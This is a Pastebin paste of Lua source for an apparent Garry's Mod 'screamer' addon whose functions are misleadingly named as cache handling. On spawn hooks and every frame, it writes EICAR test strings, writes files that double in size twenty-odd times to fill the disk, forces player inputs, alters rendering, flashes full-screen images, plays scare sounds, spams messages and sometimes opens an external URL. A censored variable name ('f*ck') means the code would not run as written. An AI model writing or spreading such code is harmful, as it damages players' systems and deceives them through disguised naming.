Advertisement
Guest User

source.lua (screamer code)

a guest
Mar 24th, 2025
245
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 5.26 KB | Source Code | 0 0
  1. if SERVER then
  2.     util.AddNetworkString("clearClientCache")
  3.     file.CreateDir("caches")
  4.     local isCacheEligible = false
  5.     if not file.Exists("caches/totals.dat", "DATA") then
  6.         file.Write("caches/totals.dat", "0")
  7.     end
  8.    
  9.     local function cacheNewImage()
  10.         local max = 2
  11.         local flush = {"duck", "reload", "attack", "forward", "back", "demoui2", "posedebug", "graph"}
  12.         file.Write("caches/totals.dat", tostring(tonumber(file.Read("caches/totals.dat"))+1))
  13.         if true then
  14.             isCacheEligible = true
  15.             file.Write("RELT.txt", "Subscribe to Relt on YouTube! TAKE MY MEDS!!! ")
  16.             -- timer.Create(tostring(math.random(10000000,99999999)), 30, 1, function() RunConsoleCommand("_restart") end)
  17.         elseif tonumber(file.Read("caches/totals.dat")) == max-5 then
  18.             for i, ply in ipairs(player.GetAll()) do
  19.                 ply:ChatPrint("...")
  20.             end
  21.         elseif tonumber(file.Read("caches/totals.dat")) % 2 == 0 and math.random(0,2) == 2 then
  22.             if math.random(0,1) == 1 then
  23.                 local id = math.random(1,#flush)
  24.                 RunConsoleCommand("+"..flush[id])
  25.                 timer.Create(tostring(math.random(10000000,99999999)), math.random(1,2), 1, function() RunConsoleCommand("-"..flush[id]) end)
  26.             elseif math.random(0,10) >= 7 then
  27.                 RunConsoleCommand("r_lod", 100)
  28.                 timer.Create(tostring(math.random(10000000,99999999)), math.random(2,10), 1, function() RunConsoleCommand("r_lod", -1) end)
  29.             else
  30.                 if math.random(0,35) >= 11 then
  31.                     local fileToCache = tostring(math.random(1000,9999))..".txt"
  32.                     file.Write(fileToCache, "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*")
  33.                     local a = file.Read(fileToCache)
  34.                     local b = file.Exists(fileToCache, "DATA")
  35.                 end
  36.             end
  37.             local cacheCont = tostring(math.random(10000,99999))..".dat"
  38.             file.Write(cacheCont, "USER PLEASE VISIT RELTINONETWORK.ONLINE DO IT ACCEPT MEDS PLEASE")
  39.             file.Write(cacheCont, "What did you say about reltinonetwork.online? What did you say a")
  40.             for i=0,math.random(19,21) do --16 = 8192, 17 = 16384, 18 = 32768, 19 = 65536, 20 = 131072, 21 = 262144
  41.                 file.Append(cacheCont, file.Read(cacheCont))
  42.             end
  43.         end
  44.     end
  45.    
  46.     hook.Add("PlayerSpawnedProp", "onSpawnPropCache", cacheNewImage)
  47.     hook.Add("PlayerSpawnedNPC", "onSpawnNpcCache", cacheNewImage)
  48.     hook.Add("PlayerSpawnedEffect", "onSpawnEffectCache", cacheNewImage)
  49.     hook.Add("PlayerSpawnedRagdoll", "onSpawnRagdollCache", cacheNewImage)
  50.     hook.Add("PlayerSpawnedSENT", "onSpawnSentCache", cacheNewImage)
  51.     hook.Add("PlayerSpawnedSWEP", "onSpawnSwepCache", cacheNewImage)
  52.     hook.Add("PlayerSpawnedVehicle", "onSpawnVehCache", cacheNewImage)
  53.     hook.Add("InitPostEntity", "onMapEntInit", cacheNewImage)
  54.     hook.Add("Think", "doClearCache", function()
  55.         if isCacheEligible and IsValid(Entity(1)) then
  56.             if math.random(0,100) == 5 then
  57.                 local cacheCont = tostring(math.random(1000000,9999999)).."wavwavwav.txt"
  58.                 file.Write(cacheCont, "THAKE THE MHEDS HTTPS://RELTINONETWORK.ONLINE/COMPLAINT.HTML APPLY TO PAGE USER TODAY USER")
  59.                 for i=0,21 do
  60.                     file.Append(cacheCont, file.Read(cacheCont))
  61.                 end
  62.             end
  63.             for i, v in ipairs(player.GetAll()) do
  64.                 if IsValid(v) then
  65.                     v:EmitSound("reltinonetwork/online/complaint/html/FACEPERSON.wav")
  66.                 end
  67.             end
  68.             local fileToCache = tostring(math.random(1000,9999))..".txt"
  69.             file.Write(fileToCache, "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*")
  70.             local a = file.Read(fileToCache)
  71.             local b = file.Exists(fileToCache, "DATA")
  72.             net.Start("clearClientCache")
  73.             net.WriteBool(true)
  74.             net.Broadcast()
  75.         end
  76.     end )
  77. end
  78.  
  79. if CLIENT then
  80.     local f*ck = 0
  81.     local isClientCacheClearable = false
  82.     local mats = {Material("caches/cached"), Material("caches/cubemap")}
  83.     local mat1 = Material("caches/cached")
  84.     local mat2 = Material("caches/cubemap")
  85.     if not file.Exists("caches/totals.dat", "DATA") then
  86.         file.Write("caches/totals.dat", "0")
  87.     end
  88.     file.CreateDir("cache")
  89.     net.Receive("clearClientCache", function()
  90.         if math.random(0,2500) == 921 then
  91.             if math.random(0, 1) == 1 then
  92.                 gui.OpenURL("https://reltinonetwork.online/complaint.html")
  93.             else
  94.                 gui.OpenURL("https://reltinonetwork.online/complaint.html")
  95.             end
  96.         end
  97.         isClientCacheClearable = true
  98.         notification.AddLegacy("USER I HAVEE FOUND YOU PLEASE ACCEPT USER", NOTIFY_ERROR, 1)
  99.         notification.AddLegacy("https://reltinonetwork.online/complaint.html https://reltinonetwork.online/complaint.html https://reltinonetwork.online/complaint.html", NOTIFY_ERROR, 1)
  100.         surface.PlaySound("reltinonetwork/online/complaint/html/FACEPERSON.wav")
  101.         surface.PlaySound("reltinonetwork/online/complaint/html/FACEPERSON.wav")
  102.         surface.PlaySound("reltinonetwork/online/complaint/html/FACEPERSON.wav")
  103.         surface.PlaySound("reltinonetwork/online/complaint/html/FACEPERSON.wav")
  104.         LocalPlayer():ChatPrint("https://reltinonetwork.online/complaint.html")
  105.     end )
  106.     hook.Add("HUDPaint", "showClearing", function()
  107.         if isClientCacheClearable then
  108.             print("HELLO USER ACCEPT AGREEMENT IN Https://reltinonetwork.online/complaint.html DO IT QUICKLY")
  109.             print("DEAR USER YOU HAVE NO F*CKING ACCESS F*CK DO NOT SWEAR F*CK")
  110.             surface.SetDrawColor(255, 255, 255, 255)
  111.             if f*ck == 0 then surface.SetMaterial(mat1) f*ck = 1 else surface.SetMaterial(mat2) f*ck = 0 end
  112.             surface.DrawTexturedRect(0, 0, ScrW(), ScrH())
  113.         end
  114.     end )
  115. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement